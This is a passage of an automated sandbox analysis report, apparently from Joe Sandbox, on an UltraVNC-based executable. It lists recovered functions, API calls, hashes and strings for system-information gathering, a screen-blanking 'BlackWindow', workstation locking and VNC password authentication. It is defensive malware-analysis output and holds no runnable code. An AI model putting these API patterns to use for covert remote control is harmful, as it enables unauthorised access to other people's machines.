Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (Alpha Processor)$Current user :
API String ID: 171970310-733379141
Opcode ID: fb41818708b430e62bf73831d052d0c4d926f05be827444239f89a711e28a3fb
Instruction ID: 03a773dbe62528aab26b3a27dc75544d89e672d26aac9f8f16473e57ad466550
Opcode Fuzzy Hash: fb41818708b430e62bf73831d052d0c4d926f05be827444239f89a711e28a3fb
Instruction Fuzzy Hash: 8BB19321A2868685EB74DB3598002F977A0FF057B0F805336E67E87BD5EE28F545C320

Function 00007FF790C37A9A Relevance: 30.0, APIs: 9, Strings: 8, Instructions: 237COMMON

Download Yara Rule

APIs

sprintf.LIBCMT ref: 00007FF790C37C5B

Part of subcall function 00007FF790CE7C50: _errno.LIBCMT ref: 00007FF790CE7C88
Part of subcall function 00007FF790CE7C50: _invalid_parameter_noinfo.LIBCMT ref: 00007FF790CE7C93

sprintf.LIBCMT ref: 00007FF790C37CC6
sprintf.LIBCMT ref: 00007FF790C37D04
sprintf.LIBCMT ref: 00007FF790C37D68
GetUserNameA.ADVAPI32 ref: 00007FF790C37E9C

Strings

IP : , xrefs: 00007FF790C37FB9
v%d., xrefs: 00007FF790C37C50
Current user : , xrefs: 00007FF790C37EA6
%02d, xrefs: 00007FF790C37CB3
, (ARM Processor), xrefs: 00007FF790C37AA9
Service Pack: 6a, xrefs: 00007FF790C37D5D
Build:%d, xrefs: 00007FF790C37CF9
ComputerName : , xrefs: 00007FF790C37F2C

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (ARM Processor)$Current user :
API String ID: 171970310-978419383
Opcode ID: a8d8f491f9732d8cee92c56ad349269dc42da93c27ec5ad26cc636e7eff597dc
Instruction ID: 43607a9317e58249953e1f0308c7354cc351c47830572046719a7aa5a8811854
Opcode Fuzzy Hash: a8d8f491f9732d8cee92c56ad349269dc42da93c27ec5ad26cc636e7eff597dc
Instruction Fuzzy Hash: D6B18221A2868685EB74DB3598002F977A0FF057B0F805376EA7E87BD5EE28F555C320

Function 00007FF790C37ACF Relevance: 30.0, APIs: 9, Strings: 8, Instructions: 237COMMON

Download Yara Rule

APIs

sprintf.LIBCMT ref: 00007FF790C37C5B

Part of subcall function 00007FF790CE7C50: _errno.LIBCMT ref: 00007FF790CE7C88
Part of subcall function 00007FF790CE7C50: _invalid_parameter_noinfo.LIBCMT ref: 00007FF790CE7C93

sprintf.LIBCMT ref: 00007FF790C37CC6
sprintf.LIBCMT ref: 00007FF790C37D04
sprintf.LIBCMT ref: 00007FF790C37D68
GetUserNameA.ADVAPI32 ref: 00007FF790C37E9C

Strings

IP : , xrefs: 00007FF790C37FB9
v%d., xrefs: 00007FF790C37C50
Current user : , xrefs: 00007FF790C37EA6
%02d, xrefs: 00007FF790C37CB3
Service Pack: 6a, xrefs: 00007FF790C37D5D
Build:%d, xrefs: 00007FF790C37CF9
ComputerName : , xrefs: 00007FF790C37F2C
, (SHX Processor), xrefs: 00007FF790C37ADE

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (SHX Processor)$Current user :
API String ID: 171970310-3227166451
Opcode ID: f87aec30509e434426b08c2f6c773820ec2921cd93d1ed894a2fb9928649058d
Instruction ID: abe541a0c1054e755e9c6c169b2515b961ffbd8277ffc9fa8cf632933f1ddb48
Opcode Fuzzy Hash: f87aec30509e434426b08c2f6c773820ec2921cd93d1ed894a2fb9928649058d
Instruction Fuzzy Hash: 50B18221A2868685EB74DB3598002F977A0FF057B0F805376EA7E87BD5EE28F555C320

Function 00007FF790C37BE2 Relevance: 30.0, APIs: 9, Strings: 8, Instructions: 237COMMON

Download Yara Rule

APIs

sprintf.LIBCMT ref: 00007FF790C37C5B

Part of subcall function 00007FF790CE7C50: _errno.LIBCMT ref: 00007FF790CE7C88
Part of subcall function 00007FF790CE7C50: _invalid_parameter_noinfo.LIBCMT ref: 00007FF790CE7C93

sprintf.LIBCMT ref: 00007FF790C37CC6
sprintf.LIBCMT ref: 00007FF790C37D04
sprintf.LIBCMT ref: 00007FF790C37D68
GetUserNameA.ADVAPI32 ref: 00007FF790C37E9C

Strings

IP : , xrefs: 00007FF790C37FB9
v%d., xrefs: 00007FF790C37C50
Current user : , xrefs: 00007FF790C37EA6
%02d, xrefs: 00007FF790C37CB3
Service Pack: 6a, xrefs: 00007FF790C37D5D
Build:%d, xrefs: 00007FF790C37CF9
ComputerName : , xrefs: 00007FF790C37F2C
, (AMD64 Processor), xrefs: 00007FF790C37BF1

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (AMD64 Processor)$Current user :
API String ID: 171970310-4243357635
Opcode ID: 03aacd0ad6e6d9707dfc08155cf451b10a2e0ac72c3257671f52e65d8e606d50
Instruction ID: 22bc4e548aea7236e9bdf459b009275bdf98e33576b3bbc408c8b13117094c2c
Opcode Fuzzy Hash: 03aacd0ad6e6d9707dfc08155cf451b10a2e0ac72c3257671f52e65d8e606d50
Instruction Fuzzy Hash: 20B19321A2868685EB74DB3598002F9B7A0FF057B0F805336E67E87BD5EE28F555C320

Function 00007FF790C37B71 Relevance: 30.0, APIs: 9, Strings: 8, Instructions: 237COMMON

Download Yara Rule

APIs

sprintf.LIBCMT ref: 00007FF790C37C5B

Part of subcall function 00007FF790CE7C50: _errno.LIBCMT ref: 00007FF790CE7C88
Part of subcall function 00007FF790CE7C50: _invalid_parameter_noinfo.LIBCMT ref: 00007FF790CE7C93

sprintf.LIBCMT ref: 00007FF790C37CC6
sprintf.LIBCMT ref: 00007FF790C37D04
sprintf.LIBCMT ref: 00007FF790C37D68
GetUserNameA.ADVAPI32 ref: 00007FF790C37E9C

Strings

IP : , xrefs: 00007FF790C37FB9
v%d., xrefs: 00007FF790C37C50
, (PPC Processor), xrefs: 00007FF790C37B80
Current user : , xrefs: 00007FF790C37EA6
%02d, xrefs: 00007FF790C37CB3
Service Pack: 6a, xrefs: 00007FF790C37D5D
Build:%d, xrefs: 00007FF790C37CF9
ComputerName : , xrefs: 00007FF790C37F2C

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (PPC Processor)$Current user :
API String ID: 171970310-3099718995
Opcode ID: 6c4329df222d5528f2f071fd5f1073a2ca0bc00249f98637d5c349aac7834982
Instruction ID: f64da870c5136e5ded79531315cd282e21f14cf058ce357b883b4fe39f766940
Opcode Fuzzy Hash: 6c4329df222d5528f2f071fd5f1073a2ca0bc00249f98637d5c349aac7834982
Instruction Fuzzy Hash: 94B18221A2868685EB74DB3598002F977A0FF057B0F805336EA7E87BD5EE28F545C320

Function 00007FF790C34200 Relevance: 29.8, APIs: 11, Strings: 6, Instructions: 90threadwindowCOMMON

Download Yara Rule

APIs

OpenInputDesktop.USER32 ref: 00007FF790C34229
GetCurrentThreadId.KERNEL32 ref: 00007FF790C34253
GetThreadDesktop.USER32 ref: 00007FF790C3425B
GetUserObjectInformationA.USER32 ref: 00007FF790C3428A
SetThreadDesktop.USER32 ref: 00007FF790C342D0
GetMessageA.USER32 ref: 00007FF790C34301
TranslateMessage.USER32 ref: 00007FF790C34315
DispatchMessageA.USER32 ref: 00007FF790C34320
GetMessageA.USER32 ref: 00007FF790C34333
SetThreadDesktop.USER32 ref: 00007FF790C34355
CloseDesktop.USER32 ref: 00007FF790C34363

Strings

black_layered.cpp : SelectHDESK:!SetThreadDesktop , xrefs: 00007FF790C342DA
black_layered.cpp : end BlackWindow , xrefs: 00007FF790C3433D
black_layered.cpp : OpenInputdesktop Error , xrefs: 00007FF790C3423B
black_layered.cpp : OpenInputdesktop OK, xrefs: 00007FF790C34247
black_layered.cpp : !GetUserObjectInformation , xrefs: 00007FF790C34294
black_layered.cpp : SelectHDESK to %s (%x) from %x, xrefs: 00007FF790C342AE

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: Desktop$MessageThread$CloseCurrentDispatchInformationInputObjectOpenTranslateUser
String ID: black_layered.cpp : !GetUserObjectInformation $black_layered.cpp : OpenInputdesktop Error $black_layered.cpp : OpenInputdesktop OK$black_layered.cpp : SelectHDESK to %s (%x) from %x$black_layered.cpp : SelectHDESK:!SetThreadDesktop $black_layered.cpp : end BlackWindow
API String ID: 2763862709-1375279643
Opcode ID: 97dc65336ba64628ca373ffe4e0f0f58b485fa95820c520cbe5a523dd1110f8f
Instruction ID: f92267d4fa37230aaf68124dbb0a1dd2d7df8b9ed194287c2c3f7ff5365a78cf
Opcode Fuzzy Hash: 97dc65336ba64628ca373ffe4e0f0f58b485fa95820c520cbe5a523dd1110f8f
Instruction Fuzzy Hash: 2841F761A38A8391FA20AB35B8546FAF3B1FF89754FC46032D54E467A4DE3CF1498760

Function 00007FF790C426B0 Relevance: 28.1, APIs: 11, Strings: 5, Instructions: 78librarysleeploaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FF790C426E0
LoadLibraryA.KERNEL32 ref: 00007FF790C426F0

Part of subcall function 00007FF790C42520: LoadLibraryA.KERNEL32 ref: 00007FF790C42551
Part of subcall function 00007FF790C42520: GetProcAddress.KERNEL32 ref: 00007FF790C4256E
Part of subcall function 00007FF790C42520: LoadLibraryA.KERNEL32 ref: 00007FF790C4258B
Part of subcall function 00007FF790C42520: GetProcAddress.KERNEL32 ref: 00007FF790C425A8
Part of subcall function 00007FF790C42520: FreeLibrary.KERNEL32 ref: 00007FF790C42658
Part of subcall function 00007FF790C42520: FreeLibrary.KERNEL32 ref: 00007FF790C42667

GetProcAddress.KERNEL32 ref: 00007FF790C42719
GetProcAddress.KERNEL32 ref: 00007FF790C42731
Sleep.KERNEL32 ref: 00007FF790C42771
GetLastError.KERNEL32 ref: 00007FF790C4277D
sprintf.LIBCMT ref: 00007FF790C42792
OutputDebugStringA.KERNEL32 ref: 00007FF790C4279C
Sleep.KERNEL32 ref: 00007FF790C427A7
FreeLibrary.KERNEL32 ref: 00007FF790C427B5
FreeLibrary.KERNEL32 ref: 00007FF790C427C3

Strings

user32.dll, xrefs: 00007FF790C426E6
LockWorkstation failed with error 0x%0X, xrefs: 00007FF790C42783
LockWorkStation, xrefs: 00007FF790C42727
WinStationConnectW, xrefs: 00007FF790C4270F
winsta.dll, xrefs: 00007FF790C426D9

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: Library$AddressFreeLoadProc$Sleep$DebugErrorLastOutputStringsprintf
String ID: LockWorkStation$LockWorkstation failed with error 0x%0X$WinStationConnectW$user32.dll$winsta.dll
API String ID: 2931780912-670137772
Opcode ID: 4c941a38a0d861067d34bbbc45676cf3eae1c23976c0e3f2b532e901046bab96
Instruction ID: 7324e497374fdf4d2a0209ff9d2a3bc15013ef1cec918992947f3917b1106f1b
Opcode Fuzzy Hash: 4c941a38a0d861067d34bbbc45676cf3eae1c23976c0e3f2b532e901046bab96
Instruction Fuzzy Hash: 8E311425A38A4282EA65AF31E9552B9F3B6FF85B84FC42031DE0E46764DF2CF4458660

Function 00007FF790C52CC0 Relevance: 24.8, APIs: 9, Strings: 5, Instructions: 256COMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 00007FF790C52D28

Part of subcall function 00007FF790CE8C34: _FF_MSGBANNER.LIBCMT ref: 00007FF790CE8C64
Part of subcall function 00007FF790CE8C34: HeapAlloc.KERNEL32(?,?,00000000,00007FF790CF329C,?,?,?,00007FF790CF7749,?,?,?,00007FF790CF77F3), ref: 00007FF790CE8C89
Part of subcall function 00007FF790CE8C34: _callnewh.LIBCMT ref: 00007FF790CE8CA2
Part of subcall function 00007FF790CE8C34: _errno.LIBCMT ref: 00007FF790CE8CAD
Part of subcall function 00007FF790CE8C34: _errno.LIBCMT ref: 00007FF790CE8CB8

Part of subcall function 00007FF790CE7BF0: GetSystemTimeAsFileTime.KERNEL32(?,?,?,00007FF790C83771), ref: 00007FF790CE7BFE

GetCurrentProcessId.KERNEL32 ref: 00007FF790C52D6C

Part of subcall function 00007FF790CE7BAC: _getptd.LIBCMT ref: 00007FF790CE7BB4

rand.LIBCMT ref: 00007FF790C52D90

Part of subcall function 00007FF790CE7BC4: _getptd.LIBCMT ref: 00007FF790CE7BC8

EnterCriticalSection.KERNEL32 ref: 00007FF790C52E5E
LeaveCriticalSection.KERNEL32 ref: 00007FF790C52E86
malloc.LIBCMT ref: 00007FF790C52F54

Part of subcall function 00007FF790CE8C34: _callnewh.LIBCMT ref: 00007FF790CE8CC8
Part of subcall function 00007FF790CE8C34: _errno.LIBCMT ref: 00007FF790CE8CCD

free.LIBCMT ref: 00007FF790C53019
free.LIBCMT ref: 00007FF790C53042
free.LIBCMT ref: 00007FF790C53088

Strings

vncclient.cpp : Failed to receive challenge response from client, xrefs: 00007FF790C52ECC
vncclient.cpp : Failed to send challenge to client, xrefs: 00007FF790C53050
password authentication, xrefs: 00007FF790C52DAB
View-only password authentication, xrefs: 00007FF790C52F94
l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncpasswd.h : PASSWD : ToText called, xrefs: 00007FF790C52D0B, 00007FF790C52F37

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: _errnofree$CriticalSectionTime_callnewh_getptdmalloc$AllocCurrentEnterFileHeapLeaveProcessSystemrand
String ID: View-only password authentication$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncpasswd.h : PASSWD : ToText called$password authentication$vncclient.cpp : Failed to receive challenge response from client$vncclient.cpp : Failed to send challenge to client
API String ID: 3991686958-188493154
Opcode ID: 9d379260281130677ec767493c4a79257c318867dcb6e5a486f079a26b47f014
Instruction ID: 464ddbb33c09a88324999079cc17dd98e310167c865425211650d6c7b4c27f63
Opcode Fuzzy Hash: 9d379260281130677ec767493c4a79257c318867dcb6e5a486f079a26b47f014
Instruction Fuzzy Hash: 64B1C222B2864285FB24FB35D8552FDB3A1EF86B58F845232DA1E477D5EE38E405C360

Function 00007FF790C4BB80 Relevance: 24.3, APIs: 16, Instructions: 345COMMON

Download Yara Rule

APIs

GetRegionData.GDI32 ref: 00007FF790C4BBE4

Part of subcall function 00007FF790C3FA00: GetRegionData.GDI32 ref: 00007FF790C3FA4F

Part of subcall function 00007FF790CE92A4: malloc.LIBCMT ref: 00007FF790CE92C7

CreateRectRgn.GDI32 ref: 00007FF790C4BC88

Part of subcall function 00007FF790C3F940: CreateRectRgn.GDI32 ref: 00007FF790C3F972
Part of subcall function 00007FF790C3F940: CombineRgn.GDI32 ref: 00007FF790C3F98A
Part of subcall function 00007FF790C3F940: CombineRgn.GDI32 ref: 00007FF790C3F99F

SetRectRgn.GDI32 ref: 00007FF790C4BCC0
CombineRgn.GDI32 ref: 00007FF790C4BCD9
DeleteObject.GDI32 ref: 00007FF790C4BCE3
free.LIBCMT ref: 00007FF790C4BCED

Part of subcall function 00007FF790CE8BF4: RtlFreeHeap.NTDLL(?,?,?,00007FF790CE748C), ref: 00007FF790CE8C0A
Part of subcall function 00007FF790CE8BF4: _errno.LIBCMT ref: 00007FF790CE8C14
Part of subcall function 00007FF790CE8BF4: GetLastError.KERNEL32(?,?,?,00007FF790CE748C), ref: 00007FF790CE8C1C

DeleteObject.GDI32 ref: 00007FF790C4BCF5
free.LIBCMT ref: 00007FF790C4BCFE
CreateRectRgn.GDI32 ref: 00007FF790C4BDB3
SetRectRgn.GDI32 ref: 00007FF790C4BDEB
CombineRgn.GDI32 ref: 00007FF790C4BE01
DeleteObject.GDI32 ref: 00007FF790C4BE0B
free.LIBCMT ref: 00007FF790C4BE15
DeleteObject.GDI32 ref: 00007FF790C4BE1D
free.LIBCMT ref: 00007FF790C4BE26
GetRegionData.GDI32 ref: 00007FF790C4BE4B

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: Rect$CombineDeleteObjectfree$CreateDataRegion$ErrorFreeHeapLast_errnomalloc
String ID:
API String ID: 2853843867-0
Opcode ID: 7aa13fe935640deb479e886ec7f566d84b1648c63b6ef7921255f0d22633ce45
Instruction ID: 9f24aaf7e2c5b243704e7a97056ba898e0319b4647691e21a37a387dec4326cc
Opcode Fuzzy Hash: 7aa13fe935640deb479e886ec7f566d84b1648c63b6ef7921255f0d22633ce45
Instruction Fuzzy Hash: 7EE1A436A28A8186EB60EB75E4446EDB7B2FF89B84F805035EE4D53B54DF38E445CB10

Function 00007FF790C46930 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 180windowCOMMON

Download Yara Rule

APIs

free.LIBCMT ref: 00007FF790C46987

Part of subcall function 00007FF790CE8BF4: RtlFreeHeap.NTDLL(?,?,?,00007FF790CE748C), ref: 00007FF790CE8C0A
Part of subcall function 00007FF790CE8BF4: _errno.LIBCMT ref: 00007FF790CE8C14
Part of subcall function 00007FF790CE8BF4: GetLastError.KERNEL32(?,?,?,00007FF790CE748C), ref: 00007FF790CE8C1C

Part of subcall function 00007FF790C470B0: EnumDisplaySettingsA.USER32 ref: 00007FF790C470F4
Part of subcall function 00007FF790C470B0: LoadLibraryA.KERNEL32 ref: 00007FF790C47109
Part of subcall function 00007FF790C470B0: GetProcAddress.KERNEL32 ref: 00007FF790C4712D
Part of subcall function 00007FF790C470B0: FreeLibrary.KERNEL32 ref: 00007FF790C471F2

malloc.LIBCMT ref: 00007FF790C46996
GetDC.USER32 ref: 00007FF790C46A00
GetSystemPaletteEntries.GDI32 ref: 00007FF790C46A2A
GetLastError.KERNEL32 ref: 00007FF790C46A33
DeleteDC.GDI32 ref: 00007FF790C46A64
ReleaseDC.USER32 ref: 00007FF790C46A71

Strings

l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : failed to allocate translation table, xrefs: 00007FF790C469A4
l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using video Palette, xrefs: 00007FF790C469F2
l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable done, xrefs: 00007FF790C46BB2
